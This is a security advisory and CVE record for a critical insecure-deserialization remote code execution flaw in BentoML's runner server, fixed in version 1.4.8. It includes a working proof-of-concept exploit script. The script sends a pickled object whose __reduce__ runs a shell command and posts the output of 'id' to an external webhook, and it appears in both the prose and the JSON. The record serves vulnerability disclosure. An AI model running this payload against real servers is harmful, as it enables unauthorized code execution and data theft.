ghsa-7v4r-c989-xh26

Vulnerability from github

Published

2025-04-09 12:59

Modified

2025-04-23 15:24

Severity

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
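As a worked check on the score above, the following sketch recomputes the CVSS 3.1 base score from the vector string, using the metric weights and formulas published in the CVSS v3.1 specification. It handles only Scope: Unchanged vectors (the case here), and the names `WEIGHTS`, `roundup`, and `base_score` are illustrative choices, not part of any library.

```python
import math

# Metric weights from the CVSS v3.1 specification (Scope: Unchanged only).
WEIGHTS = {
    "AV": {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2},
    "AC": {"L": 0.77, "H": 0.44},
    "PR": {"N": 0.85, "L": 0.62, "H": 0.27},
    "UI": {"N": 0.85, "R": 0.62},
    "C": {"H": 0.56, "L": 0.22, "N": 0.0},
    "I": {"H": 0.56, "L": 0.22, "N": 0.0},
    "A": {"H": 0.56, "L": 0.22, "N": 0.0},
}


def roundup(value: float) -> float:
    """Round up to one decimal place using the integer-based method from the spec."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the base score for a CVSS:3.1 vector with Scope: Unchanged."""
    parts = vector.split("/")
    if parts[0] != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    metrics = dict(part.split(":") for part in parts[1:])
    if metrics["S"] != "U":
        raise ValueError("this sketch handles Scope: Unchanged only")

    w = {name: table[metrics[name]] for name, table in WEIGHTS.items()}
    iss = 1 - (1 - w["C"]) * (1 - w["I"]) * (1 - w["A"])
    impact = 6.42 * iss
    exploitability = 8.22 * w["AV"] * w["AC"] * w["PR"] * w["UI"]
    if impact <= 0:
        return 0.0
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"))  # prints 9.8
```

With every exploitability metric at its most permissive value and all three impact metrics High, the impact and exploitability sub-scores sum to roughly 9.76, which rounds up to 9.8.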

Summary

BentoML's runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization

Details

Summary

BentoML's runner server contains an insecure deserialization vulnerability. By setting specific headers and parameters in a POST request, an attacker can execute arbitrary code on the server, which gives the attacker initial access to the server and the ability to disclose information stored on it.

PoC

- First, create a file named **model.py** that defines a simple model and saves it:

```
import bentoml
import numpy as np

class mymodel:
    def predict(self, info):
        return np.abs(info)
    def __call__(self, info):
        return self.predict(info)

model = mymodel()
bentoml.picklable_model.save_model("mymodel", model)
```

- Then run the following command to save this model:

```
python3 model.py
```

- Next, create **bentofile.yaml** to build this model:

```
service: "service.py"
description: "A model serving service with BentoML"
python:
  packages:
    - bentoml
    - numpy
models:
  - tag: MyModel:latest
include:
  - "*.py"
```

- Then, create **service.py** to host this model:

```
import bentoml
from bentoml.io import NumpyNdarray
import numpy as np


model_runner = bentoml.picklable_model.get("mymodel:latest").to_runner()

svc = bentoml.Service("myservice", runners=[model_runner])

async def predict(input_data: np.ndarray):

    input_columns = np.split(input_data, input_data.shape[1], axis=1)
    result_generator = model_runner.async_run(input_columns, is_stream=True)
    async for result in result_generator:
        yield result
```

- Then, run the following commands to build and host this model:

```
bentoml build
bentoml start-runner-server --runner-name mymodel --working-dir . --host 0.0.0.0 --port 8888
```

- Finally, run the following Python script (**exploit.py**) to exploit the insecure deserialization vulnerability in BentoML's runner server:

```
import requests
import pickle

url = "http://0.0.0.0:8888/"

headers = {
    "args-number": "1",
    "Content-Type": "application/vnd.bentoml.pickled",
    "Payload-Container": "NdarrayContainer",
    "Payload-Meta": '{"format": "default"}',
    "Batch-Size": "-1",
}

class P:
    def __reduce__(self):
        return (__import__('os').system, ('curl -X POST -d "$(id)" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3',))

response = requests.post(url, headers=headers, data=pickle.dumps(P()))

print(response)
```

Replacing **NdarrayContainer** with **PandasDataFrameContainer** in the **Payload-Container** header leaves the exploit working. After **exploit.py** runs, the output of the **id** command is sent to the webhook server.
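To make the mechanism behind the PoC concrete without running any shell command, here is a harmless sketch of how `pickle.loads` calls whatever callable an object's `__reduce__` returns. The `Marker` class is a hypothetical name used only for this illustration, and the built-in `len` stands in for a dangerous callable such as `os.system`.

```python
import pickle


class Marker:
    def __reduce__(self):
        # Instead of the object's state, pickle stores the instruction
        # "call len('abc')" and replays it when the data is loaded.
        return (len, ("abc",))


blob = pickle.dumps(Marker())

# The callable runs inside loads(); no Marker instance is ever rebuilt.
result = pickle.loads(blob)

print(type(result).__name__, result)  # prints: int 3
```

The receiver gets the return value of the call rather than a `Marker` object, which shows that the sender of the bytes, not the receiver, decides which function is executed during unpickling.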

Root Cause Analysis:

- When the BentoML runner server handles a request in `src/bentoml/_internal/server/runner_app.py` and the request header `args-number` is equal to 1, it calls the function `_deserialize_single_param`, as in the code below:

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298
async def _request_handler(request: Request) -> Response:
    assert self._is_ready

    arg_num = int(request.headers["args-number"])
    r_: bytes = await request.body()

    if arg_num == 1:
        params: Params[t.Any] = _deserialize_single_param(request, r_)
```

- The function `_deserialize_single_param` takes the values of the request headers `Payload-Container`, `Payload-Meta` and `Batch-Size` and builds a `Payload` object from them, with the data taken from `request.body`:

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393
def _deserialize_single_param(request: Request, bs: bytes) -> Params[t.Any]:
    container = request.headers["Payload-Container"]
    meta = json.loads(request.headers["Payload-Meta"])
    batch_size = int(request.headers["Batch-Size"])
    kwarg_name = request.headers.get("Kwarg-Name")
    payload = Payload(
        data=bs,
        meta=meta,
        batch_size=batch_size,
        container=container,
    )
    if kwarg_name:
        d = {kwarg_name: payload}
        params: Params[t.Any] = Params(**d)
    else:
        params: Params[t.Any] = Params(payload)

    return params
```

- After building the `Params` object containing the payload, the handler calls the function `infer` with the `params` variable as input:

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304
try:
  payload = await infer(params)
```

- Inside the function `infer`, the `params` variable, which is an instance of class `Params`, calls that class's `map` function with `AutoContainer.from_payload` as a parameter:

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289
async def infer(params: Params[t.Any]) -> Payload:
      params = params.map(AutoContainer.from_payload)

      try:
          ret = await runner_method.async_run(
              *params.args, **params.kwargs
          )
      except Exception:
          traceback.print_exc()
          raise

      return AutoContainer.to_payload(ret, 0)
```

- Class `Params` defines the function `map`, which calls `AutoContainer.from_payload` on each stored `Payload`, that is, on the object carrying `data`, `meta`, `batch_size` and `container`:

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66
def map(self, function: t.Callable[[T], To]) -> Params[To]:
    """
    Apply a function to all the values in the Params and return a Params of the
    return values.
    """
    args = tuple(function(a) for a in self.args)
    kwargs = {k: function(v) for k, v in self.kwargs.items()}
    return Params[To](*args, **kwargs)
```

- Class `AutoContainer` defines the function `from_payload`, which finds the container class named by `payload.container` (the value of the `Payload-Container` header) and returns the result of calling `from_payload` on that class:

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712
def from_payload(cls, payload: Payload) -> t.Any:
    container_cls = DataContainerRegistry.find_by_name(payload.container)
    return container_cls.from_payload(payload)
```

If the attacker sets the `Payload-Container` header to `NdarrayContainer` or `PandasDataFrameContainer`, the corresponding `from_payload` is called. It checks whether `payload.meta["format"] == "default"` and, if so, calls `pickle.loads(payload.data)`. `payload.meta` comes from the `Payload-Meta` header, which the attacker can set to `{"format": "default"}`, and `payload.data` is the value of `request.body`, which in my request is the pickled malicious `class P`. Unpickling it triggers the `__reduce__` method and executes arbitrary commands (the `curl` command in my example):

```
# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416
def from_payload(
    cls,
    payload: Payload,
) -> ext.PdDataFrame:
    if payload.meta["format"] == "default":
        return pickle.loads(payload.data)

# https://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312
def from_payload(
    cls,
    payload: Payload,
) -> ext.NpNDArray:
    format = payload.meta.get("format", "default")
    if format == "default":
        return pickle.loads(payload.data)
```
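One general way to harden a `pickle.loads` call site like the ones above is the allow-list pattern described in the Python `pickle` documentation: subclass `pickle.Unpickler` and override `find_class`. The sketch below illustrates that pattern only and should not be read as the fix shipped in BentoML 1.4.8. `RestrictedUnpickler`, `restricted_loads`, `Probe`, and the empty `ALLOWED` set are hypothetical names chosen for this example.

```python
import io
import pickle

# Hypothetical allow-list of (module, name) pairs that may be resolved.
# It is empty here, so only data built from plain pickle opcodes
# (numbers, strings, lists, dicts, ...) can be loaded.
ALLOWED = set()


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream references a global such as
        # os.system; refuse anything that is not explicitly allowed.
        if (module, name) in ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Drop-in analogue of pickle.loads() that enforces the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


class Probe:
    """Benign stand-in for a malicious object: asks the loader to call len()."""

    def __reduce__(self):
        return (len, ("abc",))


print(restricted_loads(pickle.dumps([1, 2, 3])))  # plain data still loads

try:
    restricted_loads(pickle.dumps(Probe()))
except pickle.UnpicklingError as exc:
    print("rejected:", exc)
```

An allow-list that is wide enough to rebuild real NumPy arrays or pandas data frames is much harder to get right, so avoiding pickle for data that crosses a trust boundary is generally the safer design.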

Impact

The Proof of Concept above shows how an attacker can execute the `id` command and send its output to an external server. By replacing `id` with any other OS command, an attacker can use this insecure deserialization in BentoML's runner server to obtain a remote shell on the server and install backdoors for persistent access.

JSON

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "bentoml"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0a1"
            },
            {
              "fixed": "1.4.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-32375"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-09T12:59:45Z",
    "nvd_published_at": "2025-04-09T16:15:25Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThere was an insecure deserialization in BentoML\u0027s runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server.\n\n### PoC\n - First, create a file named **model.py** to create a simple model and save it\n```\nimport bentoml\nimport numpy as np\n\nclass mymodel:\n    def predict(self, info):\n        return np.abs(info)\n    def __call__(self, info):\n        return self.predict(info)\n\nmodel = mymodel()\nbentoml.picklable_model.save_model(\"mymodel\", model)\n```\n- Then run the following command to save this model\n```\npython3 model.py\n```\n- Next, create **bentofile.yaml** to build this model\n```\nservice: \"service.py\"  \ndescription: \"A model serving service with BentoML\"  \npython:\n  packages:\n    - bentoml\n    - numpy\nmodels:\n  - tag: MyModel:latest  \ninclude:\n  - \"*.py\"  \n```\n- Then, create **service.py** to host this model\n```\nimport bentoml\nfrom bentoml.io import NumpyNdarray\nimport numpy as np\n\n\nmodel_runner = bentoml.picklable_model.get(\"mymodel:latest\").to_runner()\n\nsvc = bentoml.Service(\"myservice\", runners=[model_runner])\n\nasync def predict(input_data: np.ndarray):\n\n    input_columns = np.split(input_data, input_data.shape[1], axis=1)\n    result_generator = model_runner.async_run(input_columns, is_stream=True)\n    async for result in result_generator:\n        yield result\n```\n- Then, run the following commands to build and host this model\n```\nbentoml build\nbentoml start-runner-server --runner-name mymodel --working-dir . 
--host 0.0.0.0 --port 8888\n```\n- Finally, run this below python script to exploit insecure deserialization vulnerability in BentoML\u0027s runner server.\n```\nimport requests\nimport pickle\n\nurl = \"http://0.0.0.0:8888/\"\n\nheaders = {\n    \"args-number\": \"1\",\n    \"Content-Type\": \"application/vnd.bentoml.pickled\",\n    \"Payload-Container\": \"NdarrayContainer\", \n    \"Payload-Meta\": \u0027{\"format\": \"default\"}\u0027,\n    \"Batch-Size\": \"-1\",\n}\n\nclass P:\n    def __reduce__(self):\n        return  (__import__(\u0027os\u0027).system, (\u0027curl -X POST -d \"$(id)\" https://webhook.site/61093bfe-a006-4e9e-93e4-e201eabbb2c3\u0027,))\n\nresponse = requests.post(url, headers=headers, data=pickle.dumps(P()))\n\nprint(response)\n```\nAnd I can replace the **NdarrayContainer** with **PandasDataFrameContainer** in **Payload-Container** header and the exploit still working.\nAfter running **exploit.py** then the output of the command **id** will be send out to the WebHook server.\n\n### Root Cause Analysis:\n\n- When handling a request in BentoML runner server in `src/bentoml/_internal/server/runner_app.py`, when the request header `args-number` is equal to 1, it will call the function `_deserialize_single_param` like the code below:\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L291-L298\nasync def _request_handler(request: Request) -\u003e Response:\n    assert self._is_ready\n\n    arg_num = int(request.headers[\"args-number\"])\n    r_: bytes = await request.body()\n\n    if arg_num == 1:\n        params: Params[t.Any] = _deserialize_single_param(request, r_)\n```\n- Then this is the function of `_deserialize_single_param`, which will take the value of all request headers of `Payload-Container`, `Payload-Meta` and `Batch-Size` and the crafted into `Payload` class which will contain the data from 
`request.body`\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L376-L393\ndef _deserialize_single_param(request: Request, bs: bytes) -\u003e Params[t.Any]:\n    container = request.headers[\"Payload-Container\"]\n    meta = json.loads(request.headers[\"Payload-Meta\"])\n    batch_size = int(request.headers[\"Batch-Size\"])\n    kwarg_name = request.headers.get(\"Kwarg-Name\")\n    payload = Payload(\n        data=bs,\n        meta=meta,\n        batch_size=batch_size,\n        container=container,\n    )\n    if kwarg_name:\n        d = {kwarg_name: payload}\n        params: Params[t.Any] = Params(**d)\n    else:\n        params: Params[t.Any] = Params(payload)\n\n    return params\n```\n- After crafting `Params` containing payload, it will call to function `infer` with `params` variable as input\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L303-L304\ntry:\n  payload = await infer(params)\n```\n- Inside function `infer`, the `params` variable with is belong to class `Params` will call the function `map` of that class with `AutoContainer.from_payload` as a parameter.\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/server/runner_app.py#L278-L289\nasync def infer(params: Params[t.Any]) -\u003e Payload:\n      params = params.map(AutoContainer.from_payload)\n\n      try:\n          ret = await runner_method.async_run(\n              *params.args, **params.kwargs\n          )\n      except Exception:\n          traceback.print_exc()\n          raise\n\n      return AutoContainer.to_payload(ret, 0)\n```\n- Inside class `Params` define the function `map` which will call the `AutoContainer.from_payload` function with arguments, which are `data`, `meta`, `batch_size` and `container`\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/utils.py#L59-L66\ndef map(self, function: t.Callable[[T], To]) -\u003e Params[To]:\n    \"\"\"\n 
   Apply a function to all the values in the Params and return a Params of the\n    return values.\n    \"\"\"\n    args = tuple(function(a) for a in self.args)\n    kwargs = {k: function(v) for k, v in self.kwargs.items()}\n    return Params[To](*args, **kwargs)\n```\n- Inside class `AutoContainer` class have defined the function `from_payload` which will find the class by the `payload.container` , which is the value of header `Payload-Container`, and it will call the function `from_payload` from the chosen class as return value\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L710-L712\ndef from_payload(cls, payload: Payload) -\u003e t.Any:\n    container_cls = DataContainerRegistry.find_by_name(payload.container)\n    return container_cls.from_payload(payload)\n```\nAnd if the attacker set value of header `Payload-Container` to `NdarrayContainer` or `PandasDataFrameContainer`, it will call `from_payload` and when it then check if the `payload.meta[\"format\"] == \"default\"` it will call `pickle.loads(payload.data)` and `payload.meta[\"format\"]` is the value of header `Payload-Meta` and the attacker can set it to `{\"format\": \"default\"}` and `payload.data` is the value of `request.body` which is the payload from malicious `class P` in my request, which will trigger `__reduce__` method and then execute arbitrary commands (for my example is the `curl` command)\n```\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L411-L416\ndef from_payload(\n    cls,\n    payload: Payload,\n) -\u003e ext.PdDataFrame:\n    if payload.meta[\"format\"] == \"default\":\n        return pickle.loads(payload.data)\nhttps://github.com/bentoml/BentoML/blob/main/src/bentoml/_internal/runner/container.py#L306-L312\ndef from_payload(\n    cls,\n    payload: Payload,\n) -\u003e ext.NpNDArray:\n    format = payload.meta.get(\"format\", \"default\")\n    if format == \"default\":\n        return 
pickle.loads(payload.data)\n```\n### Impact\nIn the above Proof of Concept, I have shown how the attacker can execute command **id** and send the output of the command to the outside. By replacing **id** command with any OS commands, this insecure deserialization in BentoML\u0027s runner server will grant the attacker the permission to gain the remote shell on the server and injecting backdoors to persist access.",
  "id": "GHSA-7v4r-c989-xh26",
  "modified": "2025-04-23T15:24:05Z",
  "published": "2025-04-09T12:59:45Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-32375"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/bentoml/BentoML"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/bentoml/PYSEC-2025-32.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "BentoML\u0027s runner server Vulnerable to Remote Code Execution (RCE) via Insecure Deserialization"
}
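The `affected` range in the record above (introduced in 1.0.0a1, fixed in 1.4.8) can be turned into a quick local check. The sketch below is an illustration under stated assumptions: `release_tuple`, `is_affected`, and `installed_bentoml_status` are hypothetical helpers, and the comparison looks only at the numeric release components, so a pre-release of the fixed version would be reported as fixed. A full PEP 440 comparison would need a dedicated version parser.

```python
import re
from importlib import metadata

# Bounds taken from the advisory's "affected" range.
INTRODUCED = (1, 0, 0)  # 1.0.0a1, compared by release components only
FIXED = (1, 4, 8)


def release_tuple(version: str) -> tuple:
    """Extract the leading numeric release components, e.g. '1.0.0a1' -> (1, 0, 0)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = [int(piece) for piece in match.group().split(".")]
    parts += [0] * (3 - len(parts))  # pad '1.4' to (1, 4, 0)
    return tuple(parts[:3])


def is_affected(version: str) -> bool:
    """True if the version falls in [introduced, fixed)."""
    return INTRODUCED <= release_tuple(version) < FIXED


def installed_bentoml_status() -> str:
    """Describe the locally installed bentoml package, if any."""
    try:
        version = metadata.version("bentoml")
    except metadata.PackageNotFoundError:
        return "bentoml is not installed"
    state = "AFFECTED" if is_affected(version) else "not in the affected range"
    return f"bentoml {version}: {state}"


print(installed_bentoml_status())
```

Running it in the same Python environment as the service reports whether the installed package falls in the affected range.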

cve-2025-32375

Vulnerability from cvelistv5

Published

2025-04-09 15:30

Modified

2025-04-09 15:40

Severity

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

Insecure Deserialization leads to RCE in BentoML's runner server

References

URL	Tags
https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26	x_refsource_CONFIRM

Impacted products

Vendor	Product
bentoml	BentoML

JSON

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-32375",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-04-09T15:40:47.551113Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-04-09T15:40:52.656Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "BentoML",
          "vendor": "bentoml",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0, \u003c 1.4.8"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.8, there was an insecure deserialization in BentoML\u0027s runner server. By setting specific headers and parameters in the POST request, it is possible to execute any unauthorized arbitrary code on the server, which will grant the attackers to have the initial access and information disclosure on the server. This vulnerability is fixed in 1.4.8."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-04-09T15:30:03.842Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/bentoml/BentoML/security/advisories/GHSA-7v4r-c989-xh26"
        }
      ],
      "source": {
        "advisory": "GHSA-7v4r-c989-xh26",
        "discovery": "UNKNOWN"
      },
      "title": "Insecure Deserialization leads to RCE in BentoML\u0027s runner server"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-32375",
    "datePublished": "2025-04-09T15:30:03.842Z",
    "dateReserved": "2025-04-06T19:46:02.461Z",
    "dateUpdated": "2025-04-09T15:40:52.656Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}
